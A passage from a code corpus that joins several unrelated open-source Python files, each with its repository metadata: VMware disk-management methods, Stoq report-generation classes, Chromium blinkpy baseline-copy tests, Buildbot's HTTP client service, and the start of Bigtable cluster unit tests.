spec = self._session.vim.client.factory.create('ns0:VslmCreateSpec')
spec.capacityInMB = size_mb
spec.name = name
spec.backingSpec = self._create_fcd_backing_spec(disk_type, ds_ref)
LOG.debug("Creating fcd with spec: %(spec)s on datastore: %(ds_ref)s.",
{'spec': spec, 'ds_ref': ds_ref})
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
task = self._session.invoke_api(self._session.vim,
'CreateDisk_Task',
vstorage_mgr,
spec=spec)
task_info = self._session.wait_for_task(task)
fcd_loc = FcdLocation.create(task_info.result.config.id, ds_ref)
LOG.debug("Created fcd: %s.", fcd_loc)
return fcd_loc
def delete_fcd(self, fcd_location):
cf = self._session.vim.client.factory
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
LOG.debug("Deleting fcd: %s.", fcd_location)
task = self._session.invoke_api(self._session.vim,
'DeleteVStorageObject_Task',
vstorage_mgr,
id=fcd_location.id(cf),
datastore=fcd_location.ds_ref())
self._session.wait_for_task(task)
def clone_fcd(self, name, fcd_location, dest_ds_ref, disk_type):
cf = self._session.vim.client.factory
spec = cf.create('ns0:VslmCloneSpec')
spec.name = name
spec.backingSpec = self._create_fcd_backing_spec(disk_type,
dest_ds_ref)
LOG.debug("Copying fcd: %(fcd_loc)s to datastore: %(ds_ref)s with "
"spec: %(spec)s.",
{'fcd_loc': fcd_location,
'spec': spec,
'ds_ref': dest_ds_ref})
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
task = self._session.invoke_api(self._session.vim,
'CloneVStorageObject_Task',
vstorage_mgr,
id=fcd_location.id(cf),
datastore=fcd_location.ds_ref(),
spec=spec)
task_info = self._session.wait_for_task(task)
dest_fcd_loc = FcdLocation.create(task_info.result.config.id,
dest_ds_ref)
LOG.debug("Clone fcd: %s.", dest_fcd_loc)
return dest_fcd_loc
def extend_fcd(self, fcd_location, new_size_mb):
cf = self._session.vim.client.factory
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
LOG.debug("Extending fcd: %(fcd_loc)s to %(size)s.",
{'fcd_loc': fcd_location, 'size': new_size_mb})
task = self._session.invoke_api(self._session.vim,
'ExtendDisk_Task',
vstorage_mgr,
id=fcd_location.id(cf),
datastore=fcd_location.ds_ref(),
newCapacityInMB=new_size_mb)
self._session.wait_for_task(task)
def register_disk(self, vmdk_url, name, ds_ref):
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
LOG.debug("Registering disk: %s as fcd.", vmdk_url)
fcd = self._session.invoke_api(self._session.vim,
'RegisterDisk',
vstorage_mgr,
path=vmdk_url,
name=name)
fcd_loc = FcdLocation.create(fcd.config.id, ds_ref)
LOG.debug("Created fcd: %s.", fcd_loc)
return fcd_loc
def attach_fcd(self, backing, fcd_location):
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
spec = self._create_controller_config_spec(
VirtualDiskAdapterType.LSI_LOGIC)
reconfig_spec.deviceChange = [spec]
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Attaching fcd: %(fcd_loc)s to %(backing)s.",
{'fcd_loc': fcd_location, 'backing': backing})
task = self._session.invoke_api(self._session.vim,
"AttachDisk_Task",
backing,
diskId=fcd_location.id(cf),
datastore=fcd_location.ds_ref())
self._session.wait_for_task(task)
def detach_fcd(self, backing, fcd_location):
cf = self._session.vim.client.factory
LOG.debug("Detaching fcd: %(fcd_loc)s from %(backing)s.",
{'fcd_loc': fcd_location, 'backing': backing})
task = self._session.invoke_api(self._session.vim,
"DetachDisk_Task",
backing,
diskId=fcd_location.id(cf))
self._session.wait_for_task(task)
class FcdLocation(object):
def __init__(self, fcd_id, ds_ref_val):
self.fcd_id = fcd_id
self.ds_ref_val = ds_ref_val
@classmethod
def create(cls, fcd_id_obj, ds_ref):
return cls(fcd_id_obj.id, ds_ref.value)
def provider_location(self):
return "%s@%s" % (self.fcd_id, self.ds_ref_val)
def ds_ref(self):
return vim_util.get_moref(self.ds_ref_val, 'Datastore')
def id(self, cf):
id_obj = cf.create('ns0:ID')
id_obj.id = self.fcd_id
return id_obj
@classmethod
def from_provider_location(cls, provider_location):
fcd_id, ds_ref_val = provider_location.split('@')
return cls(fcd_id, ds_ref_val)
def __str__(self):
return self.provider_location()
|
apache-2.0
|
tiagocardosos/stoq
|
stoqlib/reporting/report.py
|
2
|
10857
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2012 Async Open Source
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
import weasyprint
from kiwi.accessor import kgetattr
from kiwi.environ import environ
from stoqlib.database.runtime import get_default_store
from stoqlib.lib.template import render_template
from stoqlib.lib.translation import stoqlib_gettext, stoqlib_ngettext
from stoqlib.lib.formatters import (get_formatted_price, get_formatted_cost,
format_quantity, format_phone_number,
get_formatted_percentage)
from stoqlib.reporting.utils import get_logo_data
_ = stoqlib_gettext
class HTMLReport(object):
template_filename = None
title = ''
complete_header = True
def __init__(self, filename):
self.filename = filename
self.logo_data = get_logo_data(get_default_store())
def _get_formatters(self):
return {
'format_price': get_formatted_price,
'format_cost': get_formatted_cost,
'format_quantity': format_quantity,
'format_percentage': get_formatted_percentage,
'format_phone': format_phone_number,
'format_date': lambda d: d and d.strftime('%x') or '',
}
def get_html(self):
assert self.title
namespace = self.get_namespace()
# Set some defaults if the report did not provide one
namespace.setdefault('subtitle', '')
namespace.setdefault('notes', [])
# Add some filters commonly used in stoq
namespace.update(self._get_formatters())
return render_template(self.template_filename,
report=self,
title=self.title,
complete_header=self.complete_header,
_=stoqlib_gettext,
stoqlib_ngettext=stoqlib_ngettext,
**namespace)
def save_html(self, filename):
html = open(filename, 'w')
html.write(self.get_html())
html.flush()
def render(self, stylesheet=None):
template_dir = environ.get_resource_filename('stoq', 'template')
html = weasyprint.HTML(string=self.get_html(),
base_url=template_dir)
return html.render(stylesheets=[weasyprint.CSS(string=stylesheet)])
def save(self):
document = self.render(stylesheet='')
document.write_pdf(self.filename)
#
# Hook methods
#
def get_namespace(self):
"""This hook method can be implemented by children and should return
parameters that will be passed to report template in form of a dict.
"""
return {}
def adjust_for_test(self):
"""This hook method must be implemented by children that generates
reports with data that change with the workstation or point in time.
This allows for the test reports to be always generated with the same
data.
"""
self.logo_data = 'logo.png'
class TableReport(HTMLReport):
"""A report that contains a single table.
Subclasses must implement get_columns and get_row, and can optionaly
implement accumulate, reset and get_summary_row.
"""
#: The title of the report. Will be present in the header.
title = None
#:
subtitle_template = _("Listing {rows} of a total of {total_rows} {item}")
#:
main_object_name = (_("item"), _("items"))
#:
filter_format_string = ""
#:
complete_header = False
#:
template_filename = "objectlist.html"
def __init__(self, filename, data, title=None, blocked_records=0,
status_name=None, filter_strings=None, status=None):
self.title = title or self.title
self.blocked_records = blocked_records
self.status_name = status_name
self.status = status
if filter_strings is None:
filter_strings = []
self.filter_strings = filter_strings
self.data = data
self.columns = self.get_columns()
self._setup_details()
HTMLReport.__init__(self, filename)
def _setup_details(self):
""" This method build the report title based on the arguments sent
by SearchBar to its class constructor.
"""
rows = len(self.data)
total_rows = rows + self.blocked_records
item = stoqlib_ngettext(self.main_object_name[0],
self.main_object_name[1], total_rows)
self.subtitle = self.subtitle_template.format(rows=rows,
total_rows=total_rows, item=item)
base_note = ""
if self.filter_format_string and self.status_name:
base_note += self.filter_format_string % self.status_name.lower()
notes = []
for filter_string in self.filter_strings:
if base_note:
notes.append('%s %s' % (base_note, filter_string))
elif filter_string:
notes.append(filter_string)
self.notes = notes
def get_data(self):
self.reset()
for obj in self.data:
self.accumulate(obj)
yield self.get_row(obj)
def accumulate(self, row):
"""This method is called once for each row in the report.
Here you can create summaries (like the sum of all payments) for the
report, that will be added in the last row of the table
"""
pass
def reset(self):
"""This is called when the iteration on all the rows starts.
Use this to setup or reset any necesary data (like the summaries)
"""
pass
def get_summary_row(self):
"""If the table needs a summary row in the end, this method should
return the list of values that will be in this last row.
The values should already be formatted for presentation.
"""
return []
def get_columns(self):
"""Get the columns for this table report.
This should return a list of dictionaries defining each column in the
table. The dictionaries should define the keys 'title', with the string
that will be in the header of the table and 'align', for adjusting the
alignment of the column ('left', 'right' or 'center')
"""
raise NotImplementedError
def get_row(self, obj):
"""Returns the data to be displayed in the row.
Subclaases must implement this method and return a list of value for
each cell in the row. This values should already be formatted correctly
(ie, a date should already be converted to a string in the desired
format).
"""
raise NotImplementedError
class ObjectListReport(TableReport):
"""Creates an pdf report from an objectlist and its current state
This report will only show the columns that are visible, in the order they
are visible. It will also show the filters that were enabled when the report
was generated.
"""
#: Defines the columns that should have a summary in the last row of the
#: report. This is a list of strings defining the attribute of the
#: respective column. Currently, only numeric values are supported (Decimal,
#: currenty, etc..).
summary = []
def __init__(self, filename, objectlist, data, *args, **kwargs):
self._objectlist = objectlist
TableReport.__init__(self, filename, data, *args, **kwargs)
def get_columns(self):
import gtk
alignments = {
gtk.JUSTIFY_LEFT: 'left',
gtk.JUSTIFY_RIGHT: 'right',
gtk.JUSTIFY_CENTER: 'center',
}
# The real columns from the objectlist
self._columns = []
columns = []
for c in self._objectlist.get_columns():
if not c.treeview_column.get_visible():
continue
if c.data_type == gtk.gdk.Pixbuf:
continue
self._columns.append(c)
columns.append(dict(title=c.title, align=alignments.get(c.justify)))
return columns
def get_cell(self, obj, column):
#XXX Maybe the default value should be ''
return column.as_string(kgetattr(obj, column.attribute, None), obj)
def get_row(self, obj):
row = []
for c in self._columns:
row.append(self.get_cell(obj, c))
return row
def accumulate(self, row):
"""This method is called once for each row in the report.
Here you can create summaries (like the sum of all payments) for the
report, that will be added in the last row of the table
"""
for i in self.summary:
self._summary[i] += getattr(row, i, 0) or 0
def reset(self):
"""This is called when the iteration on all the rows starts.
Use this to setup or reset any necesary data (like the summaries)
"""
self._summary = {}
for i in self.summary:
self._summary[i] = 0
def get_summary_row(self):
if not self.summary:
return []
row = []
for column in self._columns:
value = self._summary.get(column.attribute, '')
if value:
value = column.as_string(value)
row.append(value)
return row
class ObjectTreeReport(ObjectListReport):
"""Creates an pdf report from an objecttree and its current state
This report will only show the columns that are visible, in the order they
are visible. It will also show the filters that were enabled when the report
was generated. And finnally display parent row in bold and children row
shifted a little bit to the right
"""
template_filename = "objecttree.html"
def get_row(self, obj):
row = []
for c in self._columns:
row.append(self.get_cell(obj, c))
return self.has_parent(obj), row
def has_parent(self, obj):
raise NotImplementedError
|
gpl-2.0
|
chromium/chromium
|
third_party/blink/tools/blinkpy/tool/commands/copy_existing_baselines_unittest.py
|
7
|
6922
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
from blinkpy.tool.commands.rebaseline_unittest import BaseTestCase
from blinkpy.tool.commands.copy_existing_baselines import CopyExistingBaselines
class TestCopyExistingBaselines(BaseTestCase):
command_constructor = CopyExistingBaselines
def options(self, **kwargs):
options_dict = {
'results_directory': None,
'suffixes': 'txt',
'verbose': False,
'port_name': None,
}
options_dict.update(kwargs)
return optparse.Values(options_dict)
def baseline_path(self, path_from_web_test_dir):
port = self.tool.port_factory.get()
return self.tool.filesystem.join(port.web_tests_dir(),
path_from_web_test_dir)
# The tests in this class all depend on the fall-back path graph
# that is set up in |TestPort.FALLBACK_PATHS|.
def test_copy_baseline_mac_newer_to_older_version(self):
# The test-mac-mac10.11 baseline is copied over to the test-mac-mac10.10
# baseline directory because test-mac-mac10.10 is the "immediate
# predecessor" in the fall-back graph.
self._write(
self.baseline_path(
'platform/test-mac-mac10.11/failures/expected/image-expected.txt'
), 'original test-mac-mac10.11 result')
self.assertFalse(
self.tool.filesystem.exists(
self.baseline_path(
'platform/test-mac-mac10.10/failures/expected/image-expected.txt'
)))
self.command.execute(
self.options(
port_name='test-mac-mac10.11',
test='failures/expected/image.html'), [], self.tool)
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-mac-mac10.11/failures/expected/image-expected.txt'
)), 'original test-mac-mac10.11 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-mac-mac10.10/failures/expected/image-expected.txt'
)), 'original test-mac-mac10.11 result')
def test_copy_baseline_to_multiple_immediate_predecessors(self):
# The test-win-win10 baseline is copied over to the test-linux-trusty
# and test-win-win7 baseline paths, since both of these are "immediate
# predecessors".
self._write(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
), 'original test-win-win10 result')
self.assertFalse(
self.tool.filesystem.exists(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)))
self.command.execute(
self.options(
port_name='test-win-win10',
test='failures/expected/image.html'), [], self.tool)
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
def test_no_copy_existing_baseline(self):
# If a baseline exists already for an "immediate predecessor" baseline
# directory, (e.g. test-linux-trusty), then no "immediate successor"
# baselines (e.g. test-win-win10) are copied over.
self._write(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
), 'original test-win-win10 result')
self._write(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
), 'original test-linux-trusty result')
self.command.execute(
self.options(
port_name='test-win-win10',
test='failures/expected/image.html'), [], self.tool)
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)), 'original test-linux-trusty result')
def test_no_copy_skipped_test(self):
# If a test is skipped on some platform, no baselines are copied over
# to that directory. In this example, the test is skipped on linux,
# so the test-win-win10 baseline is not copied over.
port = self.tool.port_factory.get('test-win-win10')
self._write(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
), 'original test-win-win10 result')
self._write(port.path_to_generic_test_expectations_file(),
('# tags: [ Win Linux ]\n'
'# results: [ Failure Skip ]\n'
'[ Win ] failures/expected/image.html [ Failure ]\n'
'[ Linux ] failures/expected/image.html [ Skip ]\n'))
self.command.execute(
self.options(
port_name='test-win-win10',
test='failures/expected/image.html'), [], self.tool)
self.assertFalse(
self.tool.filesystem.exists(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)))
def test_port_for_primary_baseline(self):
# Testing a protected method - pylint: disable=protected-access
self.assertEqual(
self.command._port_for_primary_baseline('test-linux-trusty').
name(), 'test-linux-trusty')
self.assertEqual(
self.command._port_for_primary_baseline('test-mac-mac10.11').
name(), 'test-mac-mac10.11')
def test_port_for_primary_baseline_not_found(self):
# Testing a protected method - pylint: disable=protected-access
with self.assertRaises(Exception):
self.command._port_for_primary_baseline('test-foo-foo4.7')
|
bsd-3-clause
|
protatremy/buildbot
|
master/buildbot/util/httpclientservice.py
|
5
|
7451
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json as jsonmodule
import textwrap
from twisted.internet import defer
from twisted.web.client import Agent
from twisted.web.client import HTTPConnectionPool
from zope.interface import implementer
from buildbot import config
from buildbot.interfaces import IHttpResponse
from buildbot.util import service
from buildbot.util import toJson
from buildbot.util import unicode2bytes
from buildbot.util.logger import Logger
try:
import txrequests
except ImportError:
txrequests = None
try:
import treq
implementer(IHttpResponse)(treq.response._Response)
except ImportError:
treq = None
log = Logger()
@implementer(IHttpResponse)
class TxRequestsResponseWrapper(object):
def __init__(self, res):
self._res = res
def content(self):
return defer.succeed(self._res.content)
def json(self):
return defer.succeed(self._res.json())
@property
def code(self):
return self._res.status_code
class HTTPClientService(service.SharedService):
"""A SharedService class that can make http requests to remote services.
I can use either txrequests or treq, depending on what I find installed
I provide minimal get/post/put/delete API with automatic baseurl joining, and json data encoding
that is suitable for use from buildbot services.
"""
TREQ_PROS_AND_CONS = textwrap.dedent("""
txrequests is based on requests and is probably a bit more mature, but it requires threads to run,
so has more overhead.
treq is better integrated in twisted and is more and more feature equivalent
txrequests is 2.8x slower than treq due to the use of threads.
http://treq.readthedocs.io/en/latest/#feature-parity-w-requests
pip install txrequests
or
pip install treq
""")
# Those could be in theory be overridden in master.cfg by using
# import buildbot.util.httpclientservice.HTTPClientService.PREFER_TREQ = True
# We prefer at the moment keeping it simple
PREFER_TREQ = False
MAX_THREADS = 5
def __init__(self, base_url, auth=None, headers=None, verify=None, debug=False):
assert not base_url.endswith(
"/"), "baseurl should not end with /: " + base_url
service.SharedService.__init__(self)
self._base_url = base_url
self._auth = auth
self._headers = headers
self._session = None
self.verify = verify
self.debug = debug
def updateHeaders(self, headers):
if self._headers is None:
self._headers = {}
self._headers.update(headers)
@staticmethod
def checkAvailable(from_module):
"""Call me at checkConfig time to properly report config error
if neither txrequests or treq is installed
"""
if txrequests is None and treq is None:
config.error("neither txrequests nor treq is installed, but {} is requiring it\n\n{}".format(
from_module, HTTPClientService.TREQ_PROS_AND_CONS))
def startService(self):
# treq only supports basicauth, so we force txrequests if the auth is
# something else
if self._auth is not None and not isinstance(self._auth, tuple):
self.PREFER_TREQ = False
if txrequests is not None and not self.PREFER_TREQ:
self._session = txrequests.Session()
self._doRequest = self._doTxRequest
elif treq is None:
raise ImportError("{classname} requires either txrequest or treq install."
" Users should call {classname}.checkAvailable() during checkConfig()"
" to properly alert the user.".format(classname=self.__class__.__name__))
else:
self._doRequest = self._doTReq
self._pool = HTTPConnectionPool(self.master.reactor)
self._pool.maxPersistentPerHost = self.MAX_THREADS
self._agent = Agent(self.master.reactor, pool=self._pool)
def stopService(self):
if self._session:
return self._session.close()
return self._pool.closeCachedConnections()
def _prepareRequest(self, ep, kwargs):
assert ep == "" or ep.startswith("/"), "ep should start with /: " + ep
url = self._base_url + ep
if self._auth is not None and 'auth' not in kwargs:
kwargs['auth'] = self._auth
headers = kwargs.get('headers', {})
if self._headers is not None:
headers.update(self._headers)
kwargs['headers'] = headers
# we manually do the json encoding in order to automatically convert timestamps
# for txrequests and treq
json = kwargs.pop('json', None)
if isinstance(json, dict):
jsonStr = jsonmodule.dumps(json, default=toJson)
jsonBytes = unicode2bytes(jsonStr)
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = jsonBytes
return url, kwargs
def _doTxRequest(self, method, ep, **kwargs):
url, kwargs = self._prepareRequest(ep, kwargs)
if self.debug:
log.debug("http {url} {kwargs}", url=url, kwargs=kwargs)
def readContent(session, res):
# this forces reading of the content inside the thread
res.content
if self.debug:
log.debug("==> {code}: {content}", code=res.status_code, content=res.content)
return res
# read the whole content in the thread
kwargs['background_callback'] = readContent
if self.verify is False:
kwargs['verify'] = False
d = self._session.request(method, url, **kwargs)
d.addCallback(TxRequestsResponseWrapper)
d.addCallback(IHttpResponse)
return d
def _doTReq(self, method, ep, **kwargs):
url, kwargs = self._prepareRequest(ep, kwargs)
# treq requires header values to be an array
kwargs['headers'] = dict([(k, [v])
for k, v in kwargs['headers'].items()])
kwargs['agent'] = self._agent
d = getattr(treq, method)(url, **kwargs)
d.addCallback(IHttpResponse)
return d
# lets be nice to the auto completers, and don't generate that code
def get(self, ep, **kwargs):
return self._doRequest('get', ep, **kwargs)
def put(self, ep, **kwargs):
return self._doRequest('put', ep, **kwargs)
def delete(self, ep, **kwargs):
return self._doRequest('delete', ep, **kwargs)
def post(self, ep, **kwargs):
return self._doRequest('post', ep, **kwargs)
|
gpl-2.0
|
googleapis/python-bigtable
|
tests/unit/test_cluster.py
|
1
|
22563
|
# Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
import pytest
from ._testing import _make_credentials
class TestCluster(unittest.TestCase):
PROJECT = "project"
INSTANCE_ID = "instance-id"
LOCATION_ID = "location-id"
CLUSTER_ID = "cluster-id"
LOCATION_ID = "location-id"
CLUSTER_NAME = (
"projects/" + PROJECT + "/instances/" + INSTANCE_ID + "/clusters/" + CLUSTER_ID
)
LOCATION_PATH = "projects/" + PROJECT + "/locations/"
SERVE_NODES = 5
OP_ID = 5678
OP_NAME = "operations/projects/{}/instances/{}/clusters/{}/operations/{}".format(
PROJECT, INSTANCE_ID, CLUSTER_ID, OP_ID
)
KEY_RING_ID = "key-ring-id"
CRYPTO_KEY_ID = "crypto-key-id"
KMS_KEY_NAME = f"{LOCATION_PATH}/keyRings/{KEY_RING_ID}/cryptoKeys/{CRYPTO_KEY_ID}"
@staticmethod
def _get_target_class():
from google.cloud.bigtable.cluster import Cluster
return Cluster
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
@staticmethod
def _get_target_client_class():
from google.cloud.bigtable.client import Client
return Client
def _make_client(self, *args, **kwargs):
return self._get_target_client_class()(*args, **kwargs)
def test_constructor_defaults(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(self.CLUSTER_ID, instance)
self.assertEqual(cluster.cluster_id, self.CLUSTER_ID)
self.assertIs(cluster._instance, instance)
self.assertIsNone(cluster.location_id)
self.assertIsNone(cluster.state)
self.assertIsNone(cluster.serve_nodes)
self.assertIsNone(cluster.default_storage_type)
self.assertIsNone(cluster.kms_key_name)
def test_constructor_non_default(self):
from google.cloud.bigtable.enums import StorageType
from google.cloud.bigtable.enums import Cluster
STATE = Cluster.State.READY
STORAGE_TYPE_SSD = StorageType.SSD
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
_state=STATE,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
kms_key_name=self.KMS_KEY_NAME,
)
self.assertEqual(cluster.cluster_id, self.CLUSTER_ID)
self.assertIs(cluster._instance, instance)
self.assertEqual(cluster.location_id, self.LOCATION_ID)
self.assertEqual(cluster.state, STATE)
self.assertEqual(cluster.serve_nodes, self.SERVE_NODES)
self.assertEqual(cluster.default_storage_type, STORAGE_TYPE_SSD)
self.assertEqual(cluster.kms_key_name, self.KMS_KEY_NAME)
def test_name_property(self):
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(self.CLUSTER_ID, instance)
self.assertEqual(cluster.name, self.CLUSTER_NAME)
def test_kms_key_name_property(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID, instance, kms_key_name=self.KMS_KEY_NAME
)
self.assertEqual(cluster.kms_key_name, self.KMS_KEY_NAME)
with pytest.raises(AttributeError):
cluster.kms_key_name = "I'm read only"
def test_from_pb_success(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
from google.cloud.bigtable import enums
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
location = self.LOCATION_PATH + self.LOCATION_ID
state = enums.Cluster.State.RESIZING
storage_type = enums.StorageType.SSD
cluster_pb = data_v2_pb2.Cluster(
name=self.CLUSTER_NAME,
location=location,
state=state,
serve_nodes=self.SERVE_NODES,
default_storage_type=storage_type,
encryption_config=data_v2_pb2.Cluster.EncryptionConfig(
kms_key_name=self.KMS_KEY_NAME,
),
)
klass = self._get_target_class()
cluster = klass.from_pb(cluster_pb, instance)
self.assertIsInstance(cluster, klass)
self.assertEqual(cluster._instance, instance)
self.assertEqual(cluster.cluster_id, self.CLUSTER_ID)
self.assertEqual(cluster.location_id, self.LOCATION_ID)
self.assertEqual(cluster.state, state)
self.assertEqual(cluster.serve_nodes, self.SERVE_NODES)
self.assertEqual(cluster.default_storage_type, storage_type)
self.assertEqual(cluster.kms_key_name, self.KMS_KEY_NAME)
def test_from_pb_bad_cluster_name(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
bad_cluster_name = "BAD_NAME"
cluster_pb = data_v2_pb2.Cluster(name=bad_cluster_name)
klass = self._get_target_class()
with self.assertRaises(ValueError):
klass.from_pb(cluster_pb, None)
def test_from_pb_instance_id_mistmatch(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
ALT_INSTANCE_ID = "ALT_INSTANCE_ID"
client = _Client(self.PROJECT)
instance = _Instance(ALT_INSTANCE_ID, client)
self.assertNotEqual(self.INSTANCE_ID, ALT_INSTANCE_ID)
cluster_pb = data_v2_pb2.Cluster(name=self.CLUSTER_NAME)
klass = self._get_target_class()
with self.assertRaises(ValueError):
klass.from_pb(cluster_pb, instance)
def test_from_pb_project_mistmatch(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
ALT_PROJECT = "ALT_PROJECT"
client = _Client(project=ALT_PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
self.assertNotEqual(self.PROJECT, ALT_PROJECT)
cluster_pb = data_v2_pb2.Cluster(name=self.CLUSTER_NAME)
klass = self._get_target_class()
with self.assertRaises(ValueError):
klass.from_pb(cluster_pb, instance)
def test___eq__(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
cluster2 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
self.assertEqual(cluster1, cluster2)
def test___eq__type_differ(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
cluster2 = object()
self.assertNotEqual(cluster1, cluster2)
def test___ne__same_value(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
cluster2 = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
comparison_val = cluster1 != cluster2
self.assertFalse(comparison_val)
def test___ne__(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster1 = self._make_one("cluster_id1", instance, self.LOCATION_ID)
cluster2 = self._make_one("cluster_id2", instance, self.LOCATION_ID)
self.assertNotEqual(cluster1, cluster2)
def test_reload(self):
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
from google.cloud.bigtable.enums import StorageType
from google.cloud.bigtable.enums import Cluster
api = mock.create_autospec(BigtableInstanceAdminClient)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
kms_key_name=self.KMS_KEY_NAME,
)
# Create response_pb
LOCATION_ID_FROM_SERVER = "new-location-id"
STATE = Cluster.State.READY
SERVE_NODES_FROM_SERVER = 10
STORAGE_TYPE_FROM_SERVER = StorageType.HDD
response_pb = data_v2_pb2.Cluster(
name=cluster.name,
location=self.LOCATION_PATH + LOCATION_ID_FROM_SERVER,
state=STATE,
serve_nodes=SERVE_NODES_FROM_SERVER,
default_storage_type=STORAGE_TYPE_FROM_SERVER,
)
# Patch the stub used by the API method.
client._instance_admin_client = api
instance_stub = client._instance_admin_client
instance_stub.get_cluster.side_effect = [response_pb]
# Create expected_result.
expected_result = None # reload() has no return value.
# Check Cluster optional config values before.
self.assertEqual(cluster.location_id, self.LOCATION_ID)
self.assertIsNone(cluster.state)
self.assertEqual(cluster.serve_nodes, self.SERVE_NODES)
self.assertEqual(cluster.default_storage_type, STORAGE_TYPE_SSD)
# Perform the method and check the result.
result = cluster.reload()
self.assertEqual(result, expected_result)
self.assertEqual(cluster.location_id, LOCATION_ID_FROM_SERVER)
self.assertEqual(cluster.state, STATE)
self.assertEqual(cluster.serve_nodes, SERVE_NODES_FROM_SERVER)
self.assertEqual(cluster.default_storage_type, STORAGE_TYPE_FROM_SERVER)
self.assertEqual(cluster.kms_key_name, None)
def test_exists(self):
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
from google.cloud.bigtable.instance import Instance
from google.api_core import exceptions
